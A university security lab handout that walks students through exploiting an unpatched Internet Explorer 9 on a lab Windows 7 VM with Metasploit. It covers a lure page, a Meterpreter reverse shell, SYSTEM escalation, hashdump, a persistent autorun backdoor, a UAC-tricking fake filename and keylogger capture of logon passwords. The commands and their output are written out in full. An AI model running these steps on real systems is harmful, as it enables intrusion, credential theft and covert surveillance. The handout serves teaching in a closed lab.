Lab E4: Exploiting a Windows 7 Machine

TTM4175

November 19, 2014

In this lab you will be exploiting a vulnerable Windows 7 machine by serving it some
carefully crafted malware when it visits a malicious website. Having taken complete
control over the machine, you will install a keylogger on the machine which will capture
all the keystrokes of the user on the machine.

1 Configuring a virtual network

In this lab your Kali machine will run on the same local area network (LAN) as the
vulnerable Windows machine. If you have not already configured your VirtualBox to
function as a DHCP server, go back to Lab E1 and follow the instructions there in order
to set it up. Make sure that the network mode of both your Kali and Windows machine
is set to “Host-only” networking: go to “Settings → Network” and select “Host-only
Adapter” from the drop-down menu (Figure 1).
Furthermore, ensure that the Windows 7 hard drive is detached from your Kali
machine (“Settings → “Storage”).

Figure 1: Changing the network mode of your Kali VM into Internal Network.

1
 Now boot up both machines in VirtualBox and log in as user ttm4175 on the Windows
machine. After you have logged in at both machines we need to check that they are both
on the same local network (LAN). In Kali Linux run ifconfig to see your assigned IP-
address from the DHCP server:
# ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:ae:70:e6
inet addr:10.0.0.102 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:feae:70e6/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:7 errors:0 dropped:0 overruns:0 frame:0
TX packets:38 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2700 (2.6 KiB) TX bytes:3792 (3.7 KiB)

If VirtualBox was configured correctly it should have been assigned an IP-address

similar to 10.0.0.1XX. To check the IP-address on the Windows machine open up the
command line (click “Start” then type cmd and hit Enter) and run ipconfig:
C:\Users\ttm4175> ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :

Link-local IPv6 Address . . . . . : fe80::58cf:7cc9:2e25:bb00%11
IPv4 Address. . . . . . . . . . . : 10.0.0.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :

Again, the network address should read something like 10.0.0.1XX.

2 Metasploit
To exploit the vulnerable Windows machine, you will be using a tool called Metasploit.
Metasploit is a very popular penetration testing framework that comes preloaded with
hundreds of exploits for known software vulnerabilities found in a large range of systems.
The framework is commonly used to launch exploits against a vulnerable target, but it
is also a powerful development platform for creating new exploits. Metasploit has both
a command line interface and a graphical user interface. We will only be using the com-
mand line interface in this lab. A lot of additional material on how to use Metasploit can
be found at http://www.offensive-security.com/metasploit-unleashed. Some of
the material in this lab is also taken from this site.
Start Metasploit by running msfconsole, and after a little while you should be
greeted by a nice ASCII welcome logo:
# msfconsole

2
 ____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *

Validate lots of vulnerabilities to demonstrate exposure

with Metasploit Pro -- Learn more on http://rapid7.com/metasploit

=[ metasploit v4.10.0-2014082003 [core:4.10.0.pre.2014082003 api:1.0.0]]

+ -- --=[ 1331 exploits - 722 auxiliary - 214 post ]
+ -- --=[ 340 payloads - 35 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

You are now in the Metasploit command console from which you can run a lot of
different commands. At any point you can type help or ? to get a long list of all
available commands:
msf > help

Core Commands
=============

Command Description
------- -----------
? Help menu
back Move back from the current context
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
edit Edit the current module with $VISUAL or $EDITOR
exit Exit the console
...

The console functions very much like the normal Linux terminal: you can navigate
around with cd, list the contents of a folder with ls, select the previously ran commands
by “arrowing up” etc. Additionally, you also have access to all the special programs the
are bundled inside Metasploit.

2.1 Hacking Windows

Central to the Metasploit framework is its database of exploits of known software vul-
nerabilities. We are going to use one of these exploits against our Windows 7 victim. In
particular, the Windows 7 machine runs an unpathced versions of Internet Explorer 9
together with Office 2010, which contains an vulnerability that we are going to exploit.

3
Particularly, the vulnerability is assigned the CVE1 identifier CVE-2013-3893 and at
the time it affected all versions of Internet Explorer from 6 to 11 on Windows 7 sys-
tems (it has long since been patched by Microsoft so you are unlikely to encounter this
vulnerability “in the wild”).
There are two parts to a successful hack: (1) an exploit and (2) a payload. The exploit
is the input the attacker sends to the victim machine in order to take advantage of a
vulnerability in the target code. Once the exploit has run it gives the attacker control
over the vulnerable process on the compromised machine and allows him to inject and
run the payload. The payload is simply code that the attacker wants to run on the
victim machine. Typically it is a shell (a command line window) that connects back to
the attackers computer so that he can control the victim remotely. This will also be our
goal.
Metasploit’s exploits and payload are organized as multiple modules located in the
folder /usr/share/metasploit-framework/modules – having one for each target plat-
form. When you are inside the msfconsole you can access these modules directly using
special commands. To use an exploit we first have to find its name in Metasploit. To
do this we use the search utility to search for the CVE-identifier mentioned above:
msf > search cve-2013-3893
Matching Modules
================

Name Disclosure Date Rank Description

---- --------------- ---- -----------
.../ie_setmousecapture_uaf 2013-09-17 normal MS13-080 Microsoft Internet
Explorer Use-After-Free
...

The name Metasploit has given to this exploit is “ie_setmousecapture_uaf” and

can be found in the exploit/windows/browser module. Now we tell Metasploit to use
this exploit (remember to use TAB!):
msf> use exploit/windows/browser/ie_setmousecapture_uaf

The command prompt changes to msf exploit(ie_setmousecapture_uaf) > to

indicate that this exploit has now been loaded into to our current scope or context. Many
of the Metasploit commands are context dependent. For example the info command lists
useful information about a loaded exploit2 .
msf exploit(ie_setmousecapture_uaf) > info

The most interesting part of what info printed was the information on how to run
the exploit! In particularly it tells us which parameters needs to be set before launching
it. To strip out everything, but this information, use the show options command:
1
CVE stands for Common Vulnerabilities and Exposures and is a dictionary of publicly known in-
formation security vulnerabilities and exposures. It is maintained by the non-profit organization Mitre
Corporation and receives funding from the National Cyber Security Division of the U.S. Department of
Homeland Security.
2
If you ever want to remove an exploit from the scope simply type back.

4
msf ... > show options
Module options (exploit/windows/browser/ie_setmousecapture_uaf):

Name Current Setting Required Description

---- --------------- -------- -----------
Retries true no Allow the browser to retry the module
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an
address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is
randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used
(accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is
random)

This table shows which parameters are required to be set before launching the exploit
and which are optional. The ie_setmousecapture_uaf exploit works by serving a web
page containing malicious content to a visiting victim, i.e., the attacker functions as small
web server. Thus we need to provide the exploit with both the address and listening port
that attackers machine will use to serve the exploit. This is recorded in the variables
SRVHOST and SRVPORT (server host and server port respectively). The address should be
the IP address of your Kali virtual machine and the port number can be 80 in order to
simulate a typical web server. For the rest of this lab description we will assume that the
Kali machine is assigne IP address 10.0.0.101 and the Windows machine 10.0.0.102
msf ... > set srvhost <IP address of your Kali machine>
msf ... > set srvport 80

Additionally, we can (optionally) set the URL path to a very tempting link which
will lure people to our malicious web page. For example if we set URIPATH to the value
cute_kittens.html, then anyone who visits 10.0.0.101/cute_kitten.html in search
for pictures of cute kittens will be served your exploit.
msf ... > set uripath cute_kittens.html

Run show options again to verify that your chosen values have been set:
msf ... > show options
Module options (exploit/windows/browser/ie_setmousecapture_uaf):

Name Current Setting Required Description

---- --------------- -------- -----------
Retries true no Allow the browser to retry the module
SRVHOST 10.0.0.101 yes The local host to listen on...
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate...
SSLVersion SSL3 no Specify the version of SSL that...
URIPATH cute_kittens.html no The URI to use for this exploit...

5
 Next it is time to set the payload. As said previously, the payload is typically a
terminal shell that connects back to the attackers machine to give him remote access
(also known as a reverse shell). While that is really useful, Metasploit offers us something
even better: Meterpreter.
The Metasploit Meterpreter is a command interpreter payload that is injected into
the memory of the exploited process and provides extensive and extendable features to
the attacker. It of course gives you a normal terminal to work with, but it also adds all
sorts of useful small programs that you can run on the victim’s machine. Additionally,
this payload never actually hits the disk on the victim machine; everything is injected
into the process memory with no additional process created. It also provides a consistent
feature set no matter which platform is being exploited.
Set the payload with the set payload command:
msf ... > set payload windows/meterpreter/reverse_tcp
msf ... > show options

You also have to provide the payload with the listening address and port number of
the machine that it will contact back to. This could be any computer that the attacker
has set up to listen for incoming connections and that it will use to control the victim
machine. In this lab we will use the same Kali machine to both host the malicious
website and to work as the commando center which the payload connects back to. But
in principal these machine could be two completely different entities. Set the IP-address
to the one as before and just leave the port number at the default (4444):
msf ... > set lhost 10.0.0.101
msf ... > show options

Running the exploit. Now that everything is set up you can run your exploit!
msf ... > run
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.0.101:4444

[*] Using URL: http://10.0.0.101:80/cute_kittens.html
[*] Server started.

Your malicious web server now runs at port 80, waiting for incoming requests to the
cute_kittens.html web page. You can check that the service has started by typing
jobs into the msfconsole. This will display all the jobs that you have started in this
session.
msf ... > jobs

Jobs
====

Id Name
-- ----
0 Exploit: windows/browser/ie_setmousecapture_uaf

6
Getting infected. Now it is time to get a victim infected. On your Windows 7
machine open up Internet Explorer in administrator mode (Figure 2). Click “Yes” when
prompted for whether you would allow this program to make changes to this computer
or not. When Internet Explorer has started type 10.0.0.101/cute_kittens.html into
the address bar and hit Enter.

Figure 2: Running Internet Explorer 9 as administrator.

What happens next can vary a bit, either nothing happens or Internet Explorer
crashes – either way just wait for a couple seconds then close the browser. If you now
open up your Kali machine you should see something similar to the following in the
Metasploit console:
[*] 10.0.0.102 ie_setmousecapture_uaf - Gathering target information.
[*] 10.0.0.102 ie_setmousecapture_uaf - Sending response HTML.
[*] Sending stage (769536 bytes) to 10.0.0.102
[*] Meterpreter session 1 opened (10.0.0.101:4444 -> 10.0.0.102:49158) at 2014-08-22...
[*] Session ID 1 (10.0.0.101:4444 -> 10.0.0.102:49158) processing InitialAutoRunScript...
[*] Current server process: rundll32.exe (1400)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 880
[+] Successfully migrated to process

If you got the above: congratulations! – you have now hacked a Windows 7 computer!
The exploit spawned and migrated to a different process (which one? see Question 1)
on the compromised machine, containing the Meterpreter session which connects back
to the attacker’s machine. If you did not get the above just try again and make sure to
leave Internet Explorer open a few seconds after you have visited the page.
After you have successfully served the exploit, type sessions into the Metasploit
console and you will see all the sessions that are available to you:
msf ... > sessions

Active sessions
===============

7
 Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 ttm4175-PC\ttm4175 @ TTM4175-PC 10.0.0.101:4444 -> 10.0.0.102:49158 (10.0.0.102)

To control the Windows machine remotely from Kali jump into the available Meter-
preter session:
msf ... > sessions -i 1
meterpreter >

You are now “logged in” on the Windows machine. Run getuid to get the username
of the of the user that you are logged in as:
meterpreter > getuid
Server username: ttm4175-PC\ttm4175

Type help to get a list of all the options and programs you have available. For
example, to take a screenshot of the currently logged in users screen use the screenshot
tool (to make the picture more interesting make sure to have some windows open on
your Windows machine).
meterpreter > screenshot
Screenshot saved to: /root/ltblllwNK.jpeg % the picture name is random

If you now open up your home folder on the Kali machine you will find a picture
named ltblllwNK.jpeg containing the contents of the victims desktop. Try out some
other commands.
While the ttm4175 user has administrator rights on this computer, to get access to
everything on the Windows computer we need to switch to the SYSTEM user. This is
easy as long as our exploit was run with administrator privileges, just type getsystem:
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Now we have full control over this PC and can do whatever we like. For example, we
can get the contents of the SAM database that you looked at in the previous labs using
the hashdump tool.
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab 3 - DO NOT WIPE!:1002:aad3b435b51404eeaad3b435b51404ee:cfa8aca94b1cd232a504e71604bf690c:::
Lab1:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab4:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ttm4175:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

To jump out of a Meterpreter session and back to the Metasploit console type
background and the Meterpreter session will be sent to a background process. You
can resume it at anytime by running session -i <session ID> again.

8
Note: The Metasploit job serving the malicious web page is still running in the back-
ground. Any time someone with a vulnerable Internet Explorer visits your web page,
a new Meterpreter session is spawned and added to the list of available Meterpreter
sessions.

2.2 Maintaining presence

While you have now established a first foothold on the victim’s machine it is still quite
fragile. Particularly, if the user were to turn off his machine or kill the process that hosts
the shell, your Meterpreter session would be lost. Thus, after going through all the hard
work of exploiting a system, it is often a good idea to leave yourself an easier way back
into the system later. This way, if the service you exploited is down or patched, you can
still gain access to the system. Metasploit has a Meterpreter script that will create a
Meterpreter service that will be available to you even if the remote system is rebooted.
One word of warning here before we go any further. The persistent Meterpreter
session that we will use requires no authentication. This means that anyone that gains
access to the port could access your back door! This is not a good thing if you are
conducting a penetration test, as this could be a significant risk. In a real world situation
as a penetration tester one would have to be very careful as to clean up after oneself –
lest you leave behind a massive security hole in the same system that you try to secure!

2.2.1 Installing the backdoor

Once we have initially exploited the host, we run the persistence script with the -h
switch to see which options are available:
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

-A Automatically start a matching multi/handler to connect to the agent

-L <opt> Location in target host where to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on the remote host where Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back

This program will make the victim machine “phone home” to the command and
control center every ith second, allowing the attacker to regain control over the machine
again. With the -U flag we can also set up the program to automatically start once a
user logs on. We will configure our persistent Meterpreter session to wait until a user
logs on to the remote system and try to connect back to our listener every 5 seconds at
IP address 10.0.0.101 on port 443.

9
meterpreter > run persistence -U -i 5 -p 443 -r 10.0.0.101
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/.../TTM4175-PC_20141113.0315.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=10.0.0.102 LPORT=443
[*] Persistent agent script is 148446 bytes long
[+] Persistent Script written to C:\Users\ttm4175\AppData\Local\Temp\REWLBssemE.vbs
[*] Executing script C:\Users\ttm4175\AppData\Local\Temp\REWLBssemE.vbs
[+] Agent executed with PID 3968
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\LPLuHjdcUvA
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\LPLuHjdcUvA

Notice that the script also output a file TTM4175-PC_20141113.0315.rc describing

the commands that needs to be run in order to clean up the persistent listener after you
are done with it. As noted above it is crucial that one doesn’t leave an unauthenticated
backdoor on the system! Refer to Section 2.2.3 when you want clean up after yourself.

2.2.2 Using the backdoor

To verify that the backdoor works as intended first log out of your Windows 7 machine.
Soon you will see that you lose your Meterpreter sessions.
meterpreter >
[*] Meterpreter session 1 closed. Reason: Died
msf exploit(ie_setmousecapture_uaf) >

However, the persistent exploit that we planted is still active and will trigger as soon
a user logs into computer again. Now we just have to set up a payload handler on
the Kali machine that pick up the outgoing connections that comes from the Windows
machine. As usual we will set this handler to also create a Meterpreter shell:
msf exploit(ie_setmousecapture_uaf) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.0.0.101
msf exploit(handler) > set LPORT 443
msf exploit(handler) > run
[*] Started reverse handler on 10.0.0.101:443
[*] Starting the payload handler...

Now the payload handler is activated. Log in as ttm4175 again and a Meterpreter
session will be opened up for you.
[*] Sending stage (769536 bytes) to 10.0.0.101
[*] Meterpreter session 3 opened (10.0.0.102:443 -> 10.0.0.101:49157) at 2014-11-13 18:05:16 +0100
meterpreter >

You have now regained control over the machine.

2.2.3 Cleaning up after yourself

To clean up your backdoor you have to follow the directions that the persistence script
left behind in the /root/.msf4/logs/persistence folder when it was run. In a new
terminal window on Kali Linux go to this folder:

10
# cd /root/.msf4/logs/persistence/
# ls
TTM4175-PC_20141114.0559 TTM4175-PC_20141114.1956 TTM4175-PC_20141114.4702
TTM4175-PC_20141114.0856 TTM4175-PC_20141114.4031

The contents of this folder are more folders, one for each time you installed the
persistence backdoor. In each folder X there is a file called X.rc containing the com-
mands you need to run in order to remove the backdoor. For example the contents of
TTM4175-PC_20141114.4702/TTM4175-PC_20141114.4702.rc is the following:
# cat TTM4175-PC_20141114.4702/TTM4175-PC_20141114.4702.rc
rm C:\Windows\TEMP\UxsKhOmVGnTRE.vbs
kill 3028
reg deleteval -k ’HKCU\Software\Microsoft\Windows\CurrentVersion\Run’ -v WCAszyAHzV

If you are not already logged into a Meterpreter session, jump into it with sessions
-i <SESSION ID> inside the msfconsole (if you have lost all your Meterpreter sessions
repeat the steps in Section 2.2.2 in order to get back your access first).
Now you need run all these commands from within the Meterpreter session.
meterpreter > rm C:\Windows\TEMP\UxsKhOmVGnTRE.vbs
meterpreter > kill 3028
meterpreter > reg deleteval -k ’HKCU\Software\Microsoft\Windows\CurrentVersion\Run’ -v WCAszyAHzV

Note that some of these commands may fail, but just ignore that. Repeat the above
steps for every folder X in /root/.msf4/logs/persistence: (1) first run cat X/X.rc
to see which commands you should run; then (2) execute them inside a Meterpreter
session as above.

2.3 Elevate access to administrator privileges

When you got the Meterpreter session back in the previous section you became logged
in as ttm4175 (check with getuid!). However, notice that you can no longer obtain
SYSTEM privileges (why? see Question 2).
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.

This means that you will not be able to fully control the computer. This is often
the situation in real life attacks – in Section 2.1 we somewhat artificially elevated our
privileges before running Internet Explorer. Typically, the first thing an attacker will
try to do once he has gotten access to a system is to elevate his privileges. Often the
attacker will try to exploit some program locally on the computer in order to get SYSTEM
access. However, we will do something much simpler: we will simply ask!
First background your current session:
meterpreter > background
msf exploit(handler) >

Now we will upload a file to the victim’s machine and simply ask him to run this
with administrator privileges.

11
msf ... > use exploit/windows/local/ask % the malicious file
msf ... > set session 2 % the available session ID
% run ‘‘sessions’’ to verify
msf ... > set payload windows/meterpreter/reverse_tcp % same payload as always
msf ... > set lhost 10.0.0.101
msf ... > set lport 4443 % notice the port number!
msf ... > show options

If you run this exploit a UAC prompt will appear on the Windows 7 machine asking
the user whether it would like to run the program or not (Figure 3a).

(a) Random file name. (b) Fake file name.

Figure 3: The Windows UAC prompt.

As you can see from Figure 3a Meterpreter has chosen the rather random looking
filename YrKhVlqbqWiYT.exe. While many people will just blindly click “Yes” without
out reading the text, some users might get a bit skeptical when seeing such a strangely
named program. However, if you read the output from the show options command
above, you’ll notice that it takes an (optional) argument called filename. If we set this
variable to something more innocent sounding, hopefully more people will be willing to
click yes in the UAC prompt.
msf ... > set filename ‘Internet Explorer.exe’ % use straight quotes in the terminal
msf ... > run

The UAC prompt in Figure 3b will probably trick more users into clicking yes. If you
click “Yes” a new Meterpreter session is started. And behold! If you now run getsystem
you’ll notice that we have obtained SYSTEM access.
meterpreter > getsystem
...got system (via technique 1).

2.4 Installing a keylogger

A keylogger is a program that logs every keystroke that the user makes on a machine.
Meterpreter comes preloaded with a keylogger utility called keyscan. Start it by running
keyscan_start. Then, on the Windows machine, have one group member create a
document and write some lines without letting the other group member know about
it. Once finished, run keyscan_dump in the Meterpreter session on the Kali machine in

12
order to obtain what the other member typed in. Try the experiment again, but this
time using the On-Screen Keyboard3 , what do you observe?
The keylogger can also be used to collect the login information of all the accounts on
the computer also. All we have to do is migrate to the WinLogon process then run the
keyscan_start again. Then all keys entered into the windows logon screen are captured
(in the clear!) and ready to be collected. First we need to our Meterpreter session is
running with the privileges of the SYSTEM user on the Windows machine. We achieve
this by running:
meterpreter > getsystem
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

The output above shows that our session has the highest privileges on the machine.
Now we need find the process ID of the WinLogon process. This is done by typing ps
which will show you all running processes on the machine just like Task Manager in
Windows.
meterpreter > ps
Process List
============

PID PPID Name Arch Session User

--- ---- ---- ---- ------- ----
0 0 [System Process] 4294967295
4 0 System 4294967295
100 480 taskhost.exe x86 1 ttm4175-PC\ttm4175
184 448 taskmgr.exe x86 1
268 4 smss.exe 4294967295
344 336 csrss.exe 4294967295
380 336 wininit.exe 4294967295
392 372 csrss.exe 4294967295
432 372 winlogon.exe 4294967295
...

From the above we see that the WinLogon process (winlogon.exe) has PID 432.
Now migrate to this process using migrate:
meterpreter > migrate 432
[*] Migrating from 880 to 432...
[*] Migration completed successfully.

Having migrated to the WinLogon process, start the keylogger again. Then on your
Windows machine simulate a logon by locking the screen (“Start → click the little arrow
next to “Shut down” then select “Lock””). Log in again, then run keyscan_dump in
Meterpreter. You now have the administrator’s password to the machine!
There is another tool called dumplinks that lists (and optionally downloads) all the
recently used documents on a Windows system. This can often contain a lot of interesting
information about the target. Read more about it by running run dumplinks -h.
3
This assumes that you remembered to reset the osk.exe binary from Lab E2! If you did not, just
go into the folder C:\Windows\System32 on your Windows machine. First verify that the backup file
you created in Lab E2 (osk.exe.backup) is still there. If it is, delete the file osk.exe then rename
osk.exe.backup to osk.exe. Done!

13
Questions
Q1. What is the purpose of merging to a different process after an exploit? Which
process did Meterpreter migrate to when you ran the exploit in Section 2.1?

Hint: Open up Task Manager on your Windows machine!

Q2. In Section 2.3 you logged in as user ttm4175 who has administrator rights on the
computer. Why then, did you not get full access when he logged in and got exploited?

Q3. Even if you have already taken over a computer with a remote exploit, why can it
still be useful to dump the SAM database?

Q4. In Section 2.2 you created a backdoor by having the victim machine “phone home”
every ith second. Give another example on how to create a backdoor. Compare the
advantage/disadvantages of the two methods.

Hint: Check out the Meterpreter tool metsvc.

Q5. Sometimes your payload might be detected by Anti-Virus software on the com-
promised machine and preventing your code from running. How can we deal with this?
Does Metasploit have any support for this?

Q6. Facebook and many other websites employs encryption when delivering their web
pages in order to protect their users from eavesdropping. If a user accessed Facebook
with a keylogger installed, would encryption help him? Why? Why not?

Q7?. (This is a difficult question and is optional). Explain what a buffer overflow is.

Q8??. (This is a very difficult question and is optional). Explain the CVE-2013-3893
vulnerability (also known as MS13-080) which you exploited in this lab.

14